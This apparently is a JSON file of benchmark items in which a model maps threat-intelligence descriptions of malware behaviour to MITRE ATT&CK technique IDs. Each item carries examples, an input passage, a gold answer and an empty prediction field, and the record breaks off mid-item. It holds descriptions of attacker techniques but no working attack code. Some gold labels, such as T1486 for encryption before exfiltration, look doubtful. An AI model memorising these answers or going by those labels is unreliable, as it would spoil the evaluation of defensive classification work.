[ { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FYAnti can search the \"C:\\Windows\\Microsoft.NET\\\" directory for files of a specified size.\n\t - T1083: File and Directory Discovery\n- Text: Controlled by Micropsia operators, the malware is able to register to an event of USB volume insertion to detect new connected USB flash drives. Once an event is triggered, Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1119: Automated Collection\n- Text: Several malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.\n\t - T1070.006: Indicator Removal - Timestomp\n", "input": "\nA module in collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The ransomware terminates some processes and services, some examples of which are related to backup software and data related applications. It is likely that it does this as an attempt to debilitate any efforts the victim may take in performing backup and recovery operations after the ransomware attack\n\t - T1489: Service Stop\n- Text: Once Shellex is called, it first passes each of the items in the config buffer to their own strings. Next, it creates a mutex using the filename and checks to see if the Service key for the service name exists. If so, it opens it using service manager. If not, it first saves a copy of itself to %Program Files (x86)%/DIFXE/svchost.exe. Next, it creates the service and runs it\n\t - T1012: Query Registry\n\t - T1569.002: System Services - Service Execution\n- Text: creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", "input": "\ncan start, stop, or delete services.", "gold": "- T1569.002: System Services - Service Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mongall can inject a DLL into `rundll32.exe` for execution.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Cardinal RAT injects into a newly spawned process created from a native Windows executable.\n\t - T1055: Process Injection\n- Text: The plugin is designed to migrate the loader to the address space of another process. Injection parameters are set in the Lizar client configuration file. It should be noted that this plugin can be used not only to inject the loader, but also to execute other PE files in the address space of the specified process\n\t - T1055: Process Injection\n\t - T1055.002: Process Injection - Portable Executable Injection\n", "input": "\nIf running in a Windows environment, saves a DLL to disk that is injected into the explorer.exe process to execute the payload. can also be configured to inject and execute within specific processes.", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The group has been known to compress data before exfiltration.\n\t - T1560: Archive Collected Data\n- Text: Remsec has a package that collects documents from any inserted USB sticks.\n\t - T1025: Data from Removable Media\n- Text: UNC2452 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n", "input": "\nAfter collecting documents from removable media, compresses the collected files.", "gold": "- T1560: Archive Collected Data", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.\n\t - T1082: System Information Discovery\n- Text: HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n- Text: These infections provide backdoor access that criminals use to determine whether the host is part of an Active Directory (AD) environment. If so, criminals deploy Cobalt Strike and perform reconnaissance to map the network\n\t - T1595: Active Scanning\n\t - T1592: Gather Victim Host Information\n", "input": "\nhas the capability to gather the OS version and computer name.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A Python script was created for the purpose of automating this configuration file decoding process. The output of this script when run against the configuration file used by the first of the two Parliamentarian operation samples yielded the following data\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: has used multiple types of scripting for execution, including JavaScript, JavaScript Scriptlets in XML, and VBScript.\n\t - T1064: Scripting\n- Text: GrimAgent has the ability to set persistence using the Task Scheduler.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", "input": "\ncan use an add on feature when creating payloads that allows you to create custom Python scripts (\u201cscriptlets\u201d) to perform tasks offline (without requiring a session) such as sandbox detection, adding persistence, etc.", "gold": "- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly.\n\t - T1189: Drive-by Compromise\n- Text: Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. The macro dropped the implant to the disk, setting up persistence mechanisms and eventually executing the payload on the infected endpoint. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. The malicious domain prompts the victim to enter their name and email address to sign up and download a seemingly important \"guide on pay and allowance\n\t - T1608.004: Stage Capabilities - Drive-by Target\n- Text: In recent BitPaymer IR engagements, Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser. These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n\t - T1584.004: Compromise Infrastructure - Server\n", "input": "\nhas used watering holes to deliver files with exploits to initial victims.", "gold": "- T1189: Drive-by Compromise", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1053: Scheduled Task/Job\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: Milan has received files from C2 and stored them in log folders beginning with the character sequence `a9850d2f`.\n\t - T1105: Ingress Tool Transfer\n- Text: Turla has used various JavaScript-based backdoors.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n", "input": "\nWhen opened and then executed, the key components of the HTA file downloads and executes further malware from a remote URLand loads a decoy image hosted externally (Figure 3)", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Machete has used TLS-encrypted FTP to exfiltrate data.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: can use SSL and TLS for communications.\n\t - T1573: Encrypted Channel\n- Text: RainyDay can use RC4 to encrypt C2 communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nAll subsequent messages are encrypted with AES in CBC mode", "gold": "- T1573: Encrypted Channel\n- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bazar can use TLS in C2 communications.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: uses RC4 to encrypt C2 traffic.\n\t - T1573: Encrypted Channel\n- Text: Gazer uses custom encryption for C2 that uses 3DES.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nencrypts C2 data with AES256 in ECB mode.", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cyclops Blink can use DNS over HTTPS (DoH) to resolve C2 nodes.\n\t - T1572: Protocol Tunneling\n- Text: APT18 uses DNS for C2 communications.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: In the initial phases, the Sunburst malware talks to the C&C server by sending encoded DNS requests. These requests contain information about the infected computer; if the attackers deem it interesting enough, the DNS response includes a CNAME record pointing to a second level C&C server.\n\t - T1583.002: Acquire Infrastructure - DNS Server\n", "input": "\nWe recently mentioned this tool in another report on April 16, as this variant of the BONDUPDATER tool used DNS tunneling to communicate with its C2, specifically using TXT queries to receive information from the C2 server", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The tool is used to hide the threat actors\u2019 tools and services. The tool\u2019s configuration was added to registry run keys on a victim\u2019s computer\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1112: Modify Registry\n- Text: SUNBURST removed IFEO registry values to clean up traces of persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n- Text: APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. APT32 also creates a Windows service to establish persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", "input": "\nis capable of modifying the Registry.", "gold": "- T1112: Modify Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: gathers system information, network addresses, disk type, disk free space, and the operation system version.\n\t - T1082: System Information Discovery\n- Text: FIN7 used the command prompt to launch commands on the victim\u2019s machine.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: These infections provide backdoor access that criminals use to determine whether the host is part of an Active Directory (AD) environment. If so, criminals deploy Cobalt Strike and perform reconnaissance to map the network\n\t - T1595: Active Scanning\n\t - T1592: Gather Victim Host Information\n", "input": "\ngathers computer name and information using the systeminfo command.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: hides many of its backdoor payloads in an alternate data stream (ADS).\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n- Text: Amadey has modified the `:Zone.Identifier` in the ADS area to zero.\n\t - T1553.005: Subvert Trust Controls - Mark-of-the-Web Bypass\n- Text: Strider has used a hidden file system that is stored as a file on disk.\n\t - T1564.005: Hide Artifacts - Hidden File System\n", "input": "\nstores configuration items in alternate data streams (ADSs) if the Registry is not accessible.", "gold": "- T1564.004: Hide Artifacts - NTFS File Attributes", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SynAck enumerates all running services.\n\t - T1007: System Service Discovery\n- Text: PoshC2 contains an implementation of PsExec for remote execution.\n\t - T1569.002: System Services - Service Execution\n- Text: Wizard Spider has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.\n\t - T1489: Service Stop\n", "input": "\nruns the command net start on a victim.", "gold": "- T1007: System Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Each Casbaneiro sample using this method has the buyer\u2019s ID hardcoded in its data. When it downloads such configuration file, it parses it and finds the line that is intended for the specific buyer\u2019s ID and downloads and executes the payload\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n\t - T1105: Ingress Tool Transfer\n- Text: The samples install\u00a0HTTPBrowser at %APPDATA%/wdm.exe. Persistence is established via the HKCUSoftwareMicrosoftWindowsCurrentVersionRun key value for wdm\u00a0set to the path of the executable. Previous samples have set persistence via Run key values for 360v\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: QAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a Batch Script (.cmd) file, likely in an effort to conceal suspicious-looking command lines. \n\t - T1059: Command and Scripting Interpreter\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1027: Obfuscated Files or Information\n", "input": "\nFigure 8 CARROTBAT downloading final payload via certutil \u00a0 The downloaded CAB file has the following properties: MD5 a943e196b83c4acd9c5ce13e4c43b4f4 SHA1 e66e416f300c7efb90c383a7630c9cfe901ff9fd SHA256 cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62 File Type Microsoft Cabinet archive data, 181248 bytes, 3 files \u00a0 The following three files and their descriptions are dropped by this CAB file: \u00a0 Filename Purpose Install.bat Installation batch script responsible for copying the other files to C:\\Users\\Public\\Downloads and setting the Run registry key to ensure persistence", "gold": "- T1036: Masquerading\n- T1083: File and Directory Discovery\n- T1064: Scripting\n- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The code then decodes this set of import symbols and resolves addresses for its networking and data stealing functionality: InternetCloseHandle InternetReadFile HttpSendRequestA HttpOpenRequestA HttpQueryInfoA InternetConnectA InternetCrackUrlA InternetOpenA InternetSetOptionW GetAdaptersInfo Much like the prior office monkey \u201catiumdag.dll\u201d component, this code collects identifying system information using standard win32 API calls: Computer name \u2013 GetComputerNameW User name \u2013 GetUserNameW Adapter GUID, ip address, mac address \u2013 GetAdaptersInfo Windows version \u2013 GetVersionExW It then uses the runtime resolved networking API calls to send the collected data back to a hardcoded c2 and set of urls\n\t - T1106: Native API\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1016: System Network Configuration Discovery\n- Text: The role of Torisma is to monitor for new drives added to the system as well as remote desktop connections. This appears to be a more specialized implant focused on active monitoring on a victim\u2019s system and triggering the execution of payloads based on monitored events. The end objective of Torisma is executing shellcode on the victim\u2019s system and sending the results back to the C2\n\t - T1049: System Network Connections Discovery\n", "input": "\ncan obtain information about network parameters.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Derusbi collects current and parent process IDs.\n\t - T1057: Process Discovery\n- Text: This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. Gamaredon has used, maintained and updated development of this code for years. Its code contains anti-detection functions specifically designed to identify sandbox environments in order to thwart antivirus detection attempts\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: Rocke used scripts which detected and uninstalled antivirus software.\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", "input": "\nenumerates running processes to search for Wireshark and Windows Sysinternals suite.", "gold": "- T1518.001: Software Discovery - Security Software Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: adds a Registry Run key to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges.\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nMS\\d{2}-\\d{3}", "gold": "- T1210: Exploitation of Remote Services", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RGDoor establishes persistence on webservers as an IIS module.\n\t - T1505.004: Server Software Component - IIS Components\n- Text: APT29 has installed web shells on exploited Microsoft Exchange servers.\n\t - T1505.003: Server Software Component - Web Shell\n- Text: LightNeuron has used a malicious Microsoft Exchange transport agent for persistence.\n\t - T1505.002: Server Software Component - Transport Agent\n", "input": "\nis a Web shell that appears to be exclusively used by . It is installed as an ISAPI filter on Exchange servers and shares characteristics with the Web shell.", "gold": "- T1505.003: Server Software Component - Web Shell", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole can register itself for execution and persistence via the Control Panel.\n\t - T1218.002: System Binary Proxy Execution - Control Panel\n- Text: The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns\n\t - T1106: Native API\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n\t - T1120: Peripheral Device Discovery\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: REvil has been executed via malicious MS Word e-mail attachments.\n\t - T1204.002: User Execution - Malicious File\n", "input": "\ndrops and executes a malicious CPL file as its payload.", "gold": "- T1218.002: System Binary Proxy Execution - Control Panel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerDuke hides many of its backdoor payloads in an alternate data stream (ADS).\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n- Text: OSX/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.\n\t - T1564.009: Hide Artifacts - Resource Forking\n- Text: Strider has used a hidden file system that is stored as a file on disk.\n\t - T1564.005: Hide Artifacts - Hidden File System\n", "input": "\nThe malware platform uses Extended Attributes to store encrypted executables.", "gold": "- T1564.004: Hide Artifacts - NTFS File Attributes", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FunnyDream can stage collected information including screen captures and logged keystrokes locally.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Once the skimmer has the credit card details, it serializes the copied data into a string and encodes it with Base64. Then, it performs a character permutation on the encoded string to make sure it can\u2019t be directly decoded with Base64 decoding\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server. malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server.\n\t - T1560: Archive Collected Data\n", "input": "\nwrites collected data to a temporary file in an encrypted form before exfiltration to a C2 server.", "gold": "- T1486: Data Encrypted for Impact", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Neoichor can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=`.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: WellMail has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.\n\t - T1571: Non-Standard Port\n- Text: TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nThe malware sends an HTTP GET request to its C2 IP address using HTTP over port 443", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GreyEnergy can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: This INI file is parsed to determine what Comnie should do. Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL). Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information\n\t - T1119: Automated Collection\n- Text: QakBot can use cmd.exe to launch itself and to execute multiple C2 commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nHowever, in order to kick off the execution of the malware the attacker uses a batch script which executes the malware, but the batch script does more than simply initiate execution of the malware", "gold": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE 